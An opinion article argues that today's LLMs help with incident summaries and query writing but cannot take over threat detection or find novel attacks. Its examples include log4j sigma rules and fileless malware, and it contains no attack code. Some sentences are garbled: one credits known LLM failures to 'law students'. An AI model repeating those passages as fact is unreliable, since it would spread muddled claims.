Cybersecurity is experiencing an AI revolution. Every day new products and features are announced that leverage LLM to make security operations faster, more accurate and more efficient. The most excited experts are already talking about fully autonomous SOCs and the job of a security analyst is destined to disappear.
But are we really so close to AI taking over threat detection and response capabilities?
The arrival of the AI Singularity is still a possibility, so we can’t say we’ll never have fully autonomous, AI-powered SOCs, but to claim that the current wave of AI capabilities will lead to that is naive at best and often disingenuous marketing by technology vendors.
Generative AI capabilities are certainly impressive, but they still have limitations. Based on large amounts of training data, GenAI systems can create text, images, and even music. However, these creations are limited by the ideas and concepts created by humans. Original ideas are still difficult for current systems to comprehend.
These systems are limited because they don't understand the concepts or ideas they're dealing with, and they simply generate a stream of text that resembles a training set. We're amazed that this simple approach seems so close to real-world intelligence. However, a deeper investigation reveals clear signs of what some call “exaggerated autocomplete.”
A few examples of “failures” of these systems can help us better understand their limitations. The struggles of many law students to properly answer questions like “how many r's are in a strawberry” or “what is the world record for walking across the English Channel” perfectly illustrate this issue. It's not that ChatGPT or other systems are ignorant; they just don't know what they're “saying.” It becomes hard to even call these mistakes failures when you realize they don't cognitively understand the underlying concepts being communicated.
You may wonder why we see so many interesting and useful implementations of these technologies. The answer is that they perform well on certain problems where lack of cognitive ability or complete understanding of the data and related concepts is not a major disadvantage. For example, LLMs are ideal for generating text summaries.
So one of the most successful implementations of AI in security operations is creating text descriptions and summaries of incidents and investigations. A great use case for LLM is easily generating search queries and detection codes from human-written descriptions. But for now, most things stop there.
Threat detection issues are a high-risk area for SOCs using LLMs, as the model may appear to be capable of creating detection content. Asking Microsoft Copilot to generate questions like “Generate a sigma rule to detect log4j attacks” produces good results. However, a closer look at this question and the generated answer reveals the limitations of AI in threat detection.
By saying “log4j attack,” we are telling the model to build content based on well-known attacks. For all of the content to be generated, humans had to find and understand these attacks. There is a lag time between when the first attack occurs and when the AI is able to ingest the content and generate rules, and when a human has found the attack, properly understood it, and described it. This is clearly not an unknown attack.
The rules created are generic and based on the most well-known exploits of known vulnerabilities – this works, but it's a weak approach that produces just as many false positives and false negatives as the rules generated by the average human analyst.
People get excited about the power of these new models and claim that LLM will soon be able to detect unknown attacks. However, given the limitations of AI technology and the concept of unknown attacks, this is a mistake. To better understand the limitations of not only AI but also traditional detection systems, let's look at the emergence of fileless attacks.
Malware detection systems used to focus only on files written to disk. There were hooks that could be used to call an analyzer every time something was written to disk. What if we had a highly efficient AI-based analyzer that did this for us? Would we have the perfect anti-malware solution? No, we didn't. Attackers have moved their playground to places where data is not collected for analysis. Fileless malware is injected into memory and never written to disk, so the super AI is never exposed to malicious code. The original assumption that all malware is written to disk is no longer true, and AI systems simply don't look in the right places.
Why new attacks are hard to detect
Smart attackers will figure out how detection systems work and develop new attacks outside the visibility of the detection engines. Attack sophistication occurs at multiple levels, and those levels often circumvent the areas where detection capabilities are located. An IP network may be fully equipped to capture traffic, but is rendered useless if one of its systems is compromised by a Bluetooth vulnerability.
No AI system can analyze attack behavior at that level, spot the differences from previous behavior, and design a solution to compensate for those changes. That remains a job for humans, and will remain so until artificial general intelligence (AGI) arrives.
Know the limits of AI in the SOC
With any tool, you need to understand its value, where it helps, and its limitations. We get a lot of value from GenAI-based capabilities that support security operations. But they are not a panacea. Organizations should not extend those tools to areas where they are not good at. Otherwise, the results will not only be disappointing, but disastrous.